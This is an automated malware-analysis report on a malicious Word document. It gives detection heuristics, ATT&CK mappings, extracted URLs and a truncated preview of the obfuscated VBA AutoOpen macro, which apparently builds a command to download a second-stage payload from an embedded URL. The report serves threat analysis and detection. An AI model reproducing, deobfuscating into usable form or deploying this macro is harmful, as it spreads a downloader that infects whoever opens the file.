MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute code, likely downloading a second-stage payload from the embedded URL 'http://www.idistribXrR+XrRution.eu/bBgoXrR+Xr'. The presence of obfuscation and the suspicious URL indicate a downloader or droppper functionality.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6389653-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://wwwXrR+XrR.i In document text (OLE body)
- http://www.idistribXrR+XrRution.eu/bBgoXrR+XrIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 127290 bytes |
SHA-256: 5902e7d5c931e6be9f3cbb5fe59bce65c27eabbbe25e7ac00be8af1f5e8f52b9 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZssrMBODVRc"
Function iWKvDMcEGk()
ZwXQdBJZ = Array(Trim(Len("bzJsVYzmaPHqnK" + "riUroWXU")), Trim(Len("pCooWAshEAZ" + "zUQwswzSsi")), Trim(Len("UoRNJBt" + "DddDTjLQaXa")), Trim(Len("nkmuJEuwaaCm" + "AUzEnifK")), Trim(Len("WvTQzNjjXv" + "vOjBXDFGz")), Trim(Len("dbrvSOL" + "moubPOqa")), Trim(Len("HhPtCGTLmlwjk" + "ZNWsUbViwVU")), Trim(Len("GYTzUKwKwZhH" + "UYjfdNfCLUO")))
SosHTAOdj = Mid("UWz0jIzkXHYk+'+'HYkrR+XrREWkaXrR+X'+'rRrapaXrR+XrRs'+' + GXrR+XrRN3.eXrR+HYk+HYkXrRxHYk+H'+'YkXrR'+'+XrReGN3;XaiddTS", 8, 103)
bCppOhNtcs = Array(Trim(Len("QldJiQAIJDF" + "uuJUjNzqpz")), Trim(Len("SiTjGLRTqcqL" + "YEwVApDsnGKVkJ")), Trim(Len("knPmTAKbKktzrk" + "tEiOviPdq")), Trim(Len("tsibJKWCXjCNEs" + "NdnlGsLHYMFmWN")), Trim(Len("UKYmZHjAB" + "XuUAMjAqUi")), Trim(Len("brjHilF" + "DXzoHOroR")), Trim(Len("mhclMjzrG" + "jFwCfOsT")), Trim(Len("frWamwBXGNmUr" + "YhAYpiAJrith")))
sRkJMF = Array(Trim(Len("WWzXciuZSAurn" + "njaiAfPRA")), Trim(Len("lzVIpiu" + "FGwozmV")), Trim(Len("niIUdrsMZvcjU" + "dFWvmdNlkjFq")), Trim(Len("jSzlnJJrjIjZ" + "GIitGOjWdsSBAs")), Trim(Len("BwYOnFMuaJo" + "LqwwqWsWEC")), Trim(Len("drHPCZhjnQfqi" + "RlouOIjRqXfh")), Trim(Len("bfHWZzHuXfpJUs" + "BHfANMYlEb")), Trim(Len("uGMAjjUcFEftG" + "apuFwktPKQjsf")))
SzmvYw = Array(Trim(Len("mrAzJbKQ" + "GBailanSsYBFcA")), Trim(Len("WwnGTKcKGvnlI" + "qmLQjRfrHK")), Trim(Len("iNfBSCKqJdMn" + "wliqTiz")), Trim(Len("iwBlqoviMipdV" + "wwIosduzsiwHU")), Trim(Len("noYYMvzQdPcOPH" + "wWKiGohhfpUufE")), Trim(Len("niUAvXFQRa" + "fSsLiOmBtHoZN")), Trim(Len("FGtirATM" + "ctuPMZtG")), Trim(Len("HQJPpTLGIdLPz" + "GtpQMhZZ")))
sujmnNNUm = Mid("BWk7Uu5bAl6BP4rRV1Y1nvRCKaHK48cQV0HR1uUM2", 15, 2)
aaXhAYi = Array(Trim(Len("kDuDujEBiX" + "GprnUVNZJnWifG")), Trim(Len("wiwwQrEBsCKcz" + "mZHXJrvBcp")), Trim(Len("WTVjNYOwDmaElG" + "BnzlKtO")), Trim(Len("XNPHVOv" + "BHCtYjUfdwfvkL")), Trim(Len("VQFqHCqfAI" + "zTzRtiIsY")), Trim(Len("jMfSTTHNOSQMsu" + "QYnsKbClHlBhM")), Trim(Len("wmsmXmD" + "XoijRlpAkb")), Trim(Len("acJUANV" + "bYjSlvLRfYaU")))
JsAwEqol = Array(Trim(Len("TLQRjzZbzB" + "RwzqRZXlsqAqck")), Trim(Len("VXJhYTiupDYBb" + "iBLOEsKv")), Trim(Len("wmKnhfSVnhvdCS" + "dbjBHmtXv")), Trim(Len("JoocYsdaYKu" + "fAOXilUfi")), Trim(Len("jtlcIInMFOP" + "YrisOoSC")), Trim(Len("HXPvinkEHDP" + "dFvqvjVnLFjwWc")), Trim(Len("spWfNbBbVW" + "ZVCHzKzJvliC")), Trim(Len("FwPSCrRZG" + "rOlXCXbdZ")))
mYPMkKQJSP = Array(Trim(Len("KAcqUEECO" + "bvuCjOcjq")), Trim(Len("NJIWikwakfQdQn" + "tmUkMlukKvzIc")), Trim(Len("vYlZoBAsF" + "jHdSizzi")), Trim(Len("JqbIviIS" + "wbjcUMpHiE")), Trim(Len("lsBjMAEHcBM" + "UBTXTQpvjjbtiY")), Trim(Len("nRcbStCU" + "puvuaApXl")), Trim(Len("OaAoVqpIvCQ" + "CouQqAau")), Trim(Len("SjCiYUu" + "jtEIBJfncH")))
BOSEf = Mid("10jzpaHlSztz9iE4auAP[cHAr]97),[strinG][cHAr]36)) ').rEPLaCe('HYk',[STriNg][chAR]39)) tQzZmNdwHUWHrTQEM", 21, 65)
fkJoNPiBOm = Array(Trim(Len("OJAkEHVwMh" + "KnDaQMjZiEHT")), Trim(Len("LsLnzmT" + "JhEvwfOu")), Trim(Len("SNZdhbizlL" + "EuPHquYLwiAaN")), Trim(Len("AFziUhViJlu" + "cdRdpLacDORzF")), Trim(Len("GCwmSmM" + "jVjTRdWZliMzSv")), Trim(Len("SsozkbmoBYSaSj" + "THjczvuVuz")), Trim(Len("dcnkHjL" + "jtdnbYuh")), Trim(Len("uzCDtOKERpzw" + "WuCfzJBRQi")))
riwozYlrwob = Array(Trim(Len("ckGSzisHAJJp" + "qXvuzGwWunPIMw")), Trim(Len("iOdNtoR" + "LOCzjMuLWD")), Trim(Len("SdOlpWKO" + "zrJnkrdlfvwI")), Trim(Len("DjfuGPJAbs" + "FfXQcnr")), Trim(Len("ajXUEPPpjIfa" + "wtaiFuPu")), Trim(Len("iVwEhET" + "JsENipjPb")), Trim(Len("qaarvSzHlzm" + "tboUBBVzhL")), Trim(Len("VznWtQEtOi" + "ZUiqajHaS")))
UiKTZ = Array(Trim(Len("avihJmFMf" + "jWvDnGSXtwFjhw")), Trim(Len("zPCfbDRliVLT" + "ozlndolwSD")), Trim(Len("iRAvvJrOmwMX" + "jEqPkQh")), Trim(Len("nzjwLRFsKmf" + "VAJDWqVi")), Trim(Len("jVcaiGZwWLBWEr" + "QzjrmVcMjL")), Trim(Len("jumtuvDfGcGW" + "KfunaipRIqm")), Trim(Len("GdrcEIwPBa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.